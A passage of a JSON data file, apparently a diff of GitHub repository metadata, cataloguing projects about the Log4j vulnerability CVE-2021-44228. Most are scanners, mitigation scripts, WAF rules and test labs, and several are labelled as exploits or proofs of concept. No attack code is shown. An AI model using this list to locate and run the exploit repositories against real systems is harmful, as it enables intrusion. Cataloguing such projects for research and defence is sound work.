+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 90,
+ "watchers": 255,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 437766799,
+ "name": "Log4j-RCE-Exploiter",
+ "full_name": "thecyberneh\/Log4j-RCE-Exploiter",
+ "owner": {
+ "login": "thecyberneh",
+ "id": 75005384,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75005384?v=4",
+ "html_url": "https:\/\/github.com\/thecyberneh"
+ },
+ "html_url": "https:\/\/github.com\/thecyberneh\/Log4j-RCE-Exploiter",
+ "description": "Scanner for Log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T06:53:01Z",
+ "updated_at": "2024-04-17T08:31:16Z",
+ "pushed_at": "2022-07-06T00:37:55Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437769581,
+ "name": "log4j2",
+ "full_name": "halibobor\/log4j2",
+ "owner": {
+ "login": "halibobor",
+ "id": 96046545,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96046545?v=4",
+ "html_url": "https:\/\/github.com\/halibobor"
+ },
+ "html_url": "https:\/\/github.com\/halibobor\/log4j2",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T07:03:50Z",
+ "updated_at": "2021-12-13T09:39:44Z",
+ "pushed_at": "2021-12-13T09:30:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "jmi",
+ "log4j2"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437771197,
+ "name": "log4j-cve-code-search-resources",
+ "full_name": "sourcegraph\/log4j-cve-code-search-resources",
+ "owner": {
+ "login": "sourcegraph",
+ "id": 3979584,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3979584?v=4",
+ "html_url": "https:\/\/github.com\/sourcegraph"
+ },
+ "html_url": "https:\/\/github.com\/sourcegraph\/log4j-cve-code-search-resources",
+ "description": "Using code search to help fix\/mitigate log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T07:10:11Z",
+ "updated_at": "2022-11-09T18:14:44Z",
+ "pushed_at": "2024-04-01T21:00:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 42
+ },
+ {
+ "id": 437774679,
+ "name": "Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832",
+ "full_name": "thedevappsecguy\/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832",
+ "owner": {
+ "login": "thedevappsecguy",
+ "id": 27088213,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27088213?v=4",
+ "html_url": "https:\/\/github.com\/thedevappsecguy"
+ },
+ "html_url": "https:\/\/github.com\/thedevappsecguy\/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832",
+ "description": "Log4J CVE-2021-44228 : Mitigation Cheat Sheet",
+ "fork": false,
+ "created_at": "2021-12-13T07:24:02Z",
+ "updated_at": "2022-10-26T08:46:27Z",
+ "pushed_at": "2022-01-03T17:43:06Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437781188,
+ "name": "CVE-2021-44228",
+ "full_name": "helsecert\/CVE-2021-44228",
+ "owner": {
+ "login": "helsecert",
+ "id": 2202200,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202200?v=4",
+ "html_url": "https:\/\/github.com\/helsecert"
+ },
+ "html_url": "https:\/\/github.com\/helsecert\/CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T07:48:49Z",
+ "updated_at": "2021-12-19T23:28:13Z",
+ "pushed_at": "2022-01-04T08:15:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 437784907,
+ "name": "aws-log4j-mitigations",
+ "full_name": "markuman\/aws-log4j-mitigations",
+ "owner": {
+ "login": "markuman",
+ "id": 3920157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3920157?v=4",
+ "html_url": "https:\/\/github.com\/markuman"
+ },
+ "html_url": "https:\/\/github.com\/markuman\/aws-log4j-mitigations",
+ "description": "CVE-2021-44228 log4j mitigation using aws wafv2 with ansible",
+ "fork": false,
+ "created_at": "2021-12-13T08:01:55Z",
+ "updated_at": "2021-12-13T08:05:42Z",
+ "pushed_at": "2021-12-13T08:03:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ansible",
+ "aws",
+ "cve-2021-44228",
+ "log4j",
+ "mitigation",
+ "waf"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437788180,
+ "name": "Log4shell",
+ "full_name": "tuyenee\/Log4shell",
+ "owner": {
+ "login": "tuyenee",
+ "id": 29719729,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29719729?v=4",
+ "html_url": "https:\/\/github.com\/tuyenee"
+ },
+ "html_url": "https:\/\/github.com\/tuyenee\/Log4shell",
+ "description": "A lab for playing around with the Log4J CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T08:13:07Z",
+ "updated_at": "2023-09-28T11:34:04Z",
+ "pushed_at": "2021-12-13T09:26:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437795998,
+ "name": "Log4j-CVE-2021-44228",
+ "full_name": "JiuBanSec\/Log4j-CVE-2021-44228",
+ "owner": {
+ "login": "JiuBanSec",
+ "id": 57030243,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57030243?v=4",
+ "html_url": "https:\/\/github.com\/JiuBanSec"
+ },
+ "html_url": "https:\/\/github.com\/JiuBanSec\/Log4j-CVE-2021-44228",
+ "description": "Log4j Remote Code Injection (Apache Log4j 2.x < 2.15.0-rc2)",
+ "fork": false,
+ "created_at": "2021-12-13T08:40:13Z",
+ "updated_at": "2023-08-15T12:50:45Z",
+ "pushed_at": "2021-12-13T12:01:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437797086,
+ "name": "Log4Shell-CVE-2021-44228-ENV",
+ "full_name": "ycdxsb\/Log4Shell-CVE-2021-44228-ENV",
+ "owner": {
+ "login": "ycdxsb",
+ "id": 32149596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4",
+ "html_url": "https:\/\/github.com\/ycdxsb"
+ },
+ "html_url": "https:\/\/github.com\/ycdxsb\/Log4Shell-CVE-2021-44228-ENV",
+ "description": "Log4Shell Docker Env",
+ "fork": false,
+ "created_at": "2021-12-13T08:43:45Z",
+ "updated_at": "2023-08-15T12:50:53Z",
+ "pushed_at": "2021-12-14T02:54:48Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437797971,
+ "name": "Sitecore.Solr-log4j-mitigation",
+ "full_name": "avwolferen\/Sitecore.Solr-log4j-mitigation",
+ "owner": {
+ "login": "avwolferen",
+ "id": 11447968,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11447968?v=4",
+ "html_url": "https:\/\/github.com\/avwolferen"
+ },
+ "html_url": "https:\/\/github.com\/avwolferen\/Sitecore.Solr-log4j-mitigation",
+ "description": "This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T08:46:41Z",
+ "updated_at": "2022-01-05T17:02:45Z",
+ "pushed_at": "2022-10-19T14:57:20Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437799663,
+ "name": "log4j-scanner-CVE-2021-44228",
+ "full_name": "kek-Sec\/log4j-scanner-CVE-2021-44228",
+ "owner": {
+ "login": "kek-Sec",
+ "id": 28791067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28791067?v=4",
+ "html_url": "https:\/\/github.com\/kek-Sec"
+ },
+ "html_url": "https:\/\/github.com\/kek-Sec\/log4j-scanner-CVE-2021-44228",
+ "description": "Simple tool for scanning entire directories for attempts of CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T08:51:56Z",
+ "updated_at": "2023-09-28T11:34:04Z",
+ "pushed_at": "2021-12-14T07:57:25Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437816961,
+ "name": "log4shell-spring-framework-research",
+ "full_name": "Camphul\/log4shell-spring-framework-research",
+ "owner": {
+ "login": "Camphul",
+ "id": 23475815,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23475815?v=4",
+ "html_url": "https:\/\/github.com\/Camphul"
+ },
+ "html_url": "https:\/\/github.com\/Camphul\/log4shell-spring-framework-research",
+ "description": "Research into the implications of CVE-2021-44228 in Spring based applications.",
+ "fork": false,
+ "created_at": "2021-12-13T09:48:04Z",
+ "updated_at": "2021-12-15T10:33:35Z",
+ "pushed_at": "2021-12-15T10:33:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437820134,
+ "name": "cve-2021-44228-log4j-exploits",
+ "full_name": "lov3r\/cve-2021-44228-log4j-exploits",
+ "owner": {
+ "login": "lov3r",
+ "id": 33676682,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33676682?v=4",
+ "html_url": "https:\/\/github.com\/lov3r"
+ },
+ "html_url": "https:\/\/github.com\/lov3r\/cve-2021-44228-log4j-exploits",
+ "description": "CVE-2021-4428 复现",
+ "fork": false,
+ "created_at": "2021-12-13T09:58:11Z",
+ "updated_at": "2022-09-05T15:53:24Z",
+ "pushed_at": "2021-12-13T10:22:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437838249,
+ "name": "log4jScan",
+ "full_name": "sinakeshmiri\/log4jScan",
+ "owner": {
+ "login": "sinakeshmiri",
+ "id": 72389059,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72389059?v=4",
+ "html_url": "https:\/\/github.com\/sinakeshmiri"
+ },
+ "html_url": "https:\/\/github.com\/sinakeshmiri\/log4jScan",
+ "description": "simple python scanner to check if your network is vulnerable to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T10:59:50Z",
+ "updated_at": "2022-08-27T15:27:38Z",
+ "pushed_at": "2021-12-13T12:16:03Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437840280,
+ "name": "Log4J-Scanner",
+ "full_name": "0xDexter0us\/Log4J-Scanner",
+ "owner": {
+ "login": "0xDexter0us",
+ "id": 76158271,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76158271?v=4",
+ "html_url": "https:\/\/github.com\/0xDexter0us"
+ },
+ "html_url": "https:\/\/github.com\/0xDexter0us\/Log4J-Scanner",
+ "description": "Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.",
+ "fork": false,
+ "created_at": "2021-12-13T11:06:46Z",
+ "updated_at": "2024-04-18T01:25:02Z",
+ "pushed_at": "2021-12-26T09:58:06Z",
+ "stargazers_count": 99,
+ "watchers_count": 99,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 99,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 437847140,
+ "name": "Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228",
+ "full_name": "LutziGoz\/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228",
+ "owner": {
+ "login": "LutziGoz",
+ "id": 45577616,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45577616?v=4",
+ "html_url": "https:\/\/github.com\/LutziGoz"
+ },
+ "html_url": "https:\/\/github.com\/LutziGoz\/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T11:29:57Z",
+ "updated_at": "2022-08-14T12:05:18Z",
+ "pushed_at": "2022-02-22T00:21:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437848570,
+ "name": "Log4Shell",
+ "full_name": "0xsyr0\/Log4Shell",
+ "owner": {
+ "login": "0xsyr0",
+ "id": 67317571,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67317571?v=4",
+ "html_url": "https:\/\/github.com\/0xsyr0"
+ },
+ "html_url": "https:\/\/github.com\/0xsyr0\/Log4Shell",
+ "description": "This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 and CVE-2021-45046 aka Log4Shell.",
+ "fork": false,
+ "created_at": "2021-12-13T11:34:54Z",
+ "updated_at": "2024-01-17T16:03:44Z",
+ "pushed_at": "2024-02-21T15:47:36Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-44228",
+ "log4j",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 437860177,
+ "name": "log4j-rce-CVE-2021-44228",
+ "full_name": "1hakusai1\/log4j-rce-CVE-2021-44228",
+ "owner": {
+ "login": "1hakusai1",
+ "id": 55519230,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55519230?v=4",
+ "html_url": "https:\/\/github.com\/1hakusai1"
+ },
+ "html_url": "https:\/\/github.com\/1hakusai1\/log4j-rce-CVE-2021-44228",
+ "description": "log4j2 CVE-2021-44228 POC",
+ "fork": false,
+ "created_at": "2021-12-13T12:15:10Z",
+ "updated_at": "2022-10-04T05:04:19Z",
+ "pushed_at": "2021-12-13T13:00:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437866496,
+ "name": "log4j-rce-test",
+ "full_name": "jeffli1024\/log4j-rce-test",
+ "owner": {
+ "login": "jeffli1024",
+ "id": 33046602,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046602?v=4",
+ "html_url": "https:\/\/github.com\/jeffli1024"
+ },
+ "html_url": "https:\/\/github.com\/jeffli1024\/log4j-rce-test",
+ "description": "CVE-2021-44228 - Apache log4j RCE quick test",
+ "fork": false,
+ "created_at": "2021-12-13T12:35:39Z",
+ "updated_at": "2023-02-07T00:20:03Z",
+ "pushed_at": "2021-12-13T21:53:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437876264,
+ "name": "Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service",
+ "full_name": "zsolt-halo\/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service",
+ "owner": {
+ "login": "zsolt-halo",
+ "id": 2437516,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2437516?v=4",
+ "html_url": "https:\/\/github.com\/zsolt-halo"
+ },
+ "html_url": "https:\/\/github.com\/zsolt-halo\/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T13:05:26Z",
+ "updated_at": "2023-08-15T12:50:31Z",
+ "pushed_at": "2021-12-13T13:26:11Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437877109,
+ "name": "log4j-cve-2021-44228",
+ "full_name": "manuel-alvarez-alvarez\/log4j-cve-2021-44228",
+ "owner": {
+ "login": "manuel-alvarez-alvarez",
+ "id": 4885539,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4885539?v=4",
+ "html_url": "https:\/\/github.com\/manuel-alvarez-alvarez"
+ },
+ "html_url": "https:\/\/github.com\/manuel-alvarez-alvarez\/log4j-cve-2021-44228",
+ "description": "Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...",
+ "fork": false,
+ "created_at": "2021-12-13T13:08:03Z",
+ "updated_at": "2024-05-14T08:37:19Z",
+ "pushed_at": "2021-12-21T11:12:40Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437882599,
+ "name": "CVE-2021-44228",
+ "full_name": "VNYui\/CVE-2021-44228",
+ "owner": {
+ "login": "VNYui",
+ "id": 14999242,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14999242?v=4",
+ "html_url": "https:\/\/github.com\/VNYui"
+ },
+ "html_url": "https:\/\/github.com\/VNYui\/CVE-2021-44228",
+ "description": "Mass recognition tool for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T13:25:19Z",
+ "updated_at": "2021-12-13T13:37:39Z",
+ "pushed_at": "2021-12-13T13:37:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437883625,
+ "name": "Scan-CVE-2021-44228",
+ "full_name": "flxhaas\/Scan-CVE-2021-44228",
+ "owner": {
+ "login": "flxhaas",
+ "id": 5561099,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5561099?v=4",
+ "html_url": "https:\/\/github.com\/flxhaas"
+ },
+ "html_url": "https:\/\/github.com\/flxhaas\/Scan-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T13:28:26Z",
+ "updated_at": "2021-12-13T13:28:26Z",
+ "pushed_at": "2021-12-13T13:28:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437884471,
+ "name": "Log4j-CVE-2021-44228",
+ "full_name": "justakazh\/Log4j-CVE-2021-44228",
+ "owner": {
+ "login": "justakazh",
+ "id": 36891477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36891477?v=4",
+ "html_url": "https:\/\/github.com\/justakazh"
+ },
+ "html_url": "https:\/\/github.com\/justakazh\/Log4j-CVE-2021-44228",
+ "description": "Mass Check Vulnerable Log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T13:30:57Z",
+ "updated_at": "2023-09-28T11:34:04Z",
+ "pushed_at": "2021-12-13T14:17:59Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "exploit",
+ "log4j",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437888133,
+ "name": "f5-waf-quick-patch-cve-2021-44228",
+ "full_name": "irgoncalves\/f5-waf-quick-patch-cve-2021-44228",
+ "owner": {
+ "login": "irgoncalves",
+ "id": 23459099,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23459099?v=4",
+ "html_url": "https:\/\/github.com\/irgoncalves"
+ },
+ "html_url": "https:\/\/github.com\/irgoncalves\/f5-waf-quick-patch-cve-2021-44228",
+ "description": "This tool creates a custom signature set on F5 WAF and apply to policies in blocking mode",
+ "fork": false,
+ "created_at": "2021-12-13T13:41:39Z",
+ "updated_at": "2023-02-11T20:16:19Z",
+ "pushed_at": "2022-05-04T23:49:03Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437902732,
+ "name": "JndiLookup",
+ "full_name": "madCdan\/JndiLookup",
+ "owner": {
+ "login": "madCdan",
+ "id": 10784600,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10784600?v=4",
+ "html_url": "https:\/\/github.com\/madCdan"
+ },
+ "html_url": "https:\/\/github.com\/madCdan\/JndiLookup",
+ "description": "Some tools to help mitigating Apache Log4j 2 CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-13T14:22:34Z",
+ "updated_at": "2021-12-18T02:12:49Z",
+ "pushed_at": "2021-12-13T17:07:42Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437904012,
+ "name": "MC-Log4j-Patcher",
+ "full_name": "Koupah\/MC-Log4j-Patcher",
+ "owner": {
+ "login": "Koupah",
+ "id": 25888315,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25888315?v=4",
+ "html_url": "https:\/\/github.com\/Koupah"
+ },
+ "html_url": "https:\/\/github.com\/Koupah\/MC-Log4j-Patcher",
+ "description": "A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).",
+ "fork": false,
+ "created_at": "2021-12-13T14:26:24Z",
+ "updated_at": "2022-01-04T03:00:29Z",
+ "pushed_at": "2022-01-16T01:59:24Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437917354,
+ "name": "Fix-CVE-2021-44228",
+ "full_name": "AlexandreHeroux\/Fix-CVE-2021-44228",
+ "owner": {
+ "login": "AlexandreHeroux",
+ "id": 28022186,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28022186?v=4",
+ "html_url": "https:\/\/github.com\/AlexandreHeroux"
+ },
+ "html_url": "https:\/\/github.com\/AlexandreHeroux\/Fix-CVE-2021-44228",
+ "description": "Apply class remove process from ear\/war\/jar\/zip archive, see https:\/\/logging.apache.org\/log4j\/2.x\/",
+ "fork": false,
+ "created_at": "2021-12-13T15:04:31Z",
+ "updated_at": "2024-05-20T03:26:22Z",
+ "pushed_at": "2021-12-15T02:02:51Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437919806,
+ "name": "log4j-CVE-2021-44228-test",
+ "full_name": "kossatzd\/log4j-CVE-2021-44228-test",
+ "owner": {
+ "login": "kossatzd",
+ "id": 3578287,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3578287?v=4",
+ "html_url": "https:\/\/github.com\/kossatzd"
+ },
+ "html_url": "https:\/\/github.com\/kossatzd\/log4j-CVE-2021-44228-test",
+ "description": "demo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability",
+ "fork": false,
+ "created_at": "2021-12-13T15:11:15Z",
+ "updated_at": "2021-12-24T22:09:51Z",
+ "pushed_at": "2021-12-24T22:09:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437937629,
+ "name": "log4j-CVE-2021-44228",
+ "full_name": "tobiasoed\/log4j-CVE-2021-44228",
+ "owner": {
+ "login": "tobiasoed",
+ "id": 12912943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12912943?v=4",
+ "html_url": "https:\/\/github.com\/tobiasoed"
+ },
+ "html_url": "https:\/\/github.com\/tobiasoed\/log4j-CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T16:04:54Z",
+ "updated_at": "2021-12-21T02:30:06Z",
+ "pushed_at": "2022-02-21T23:45:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
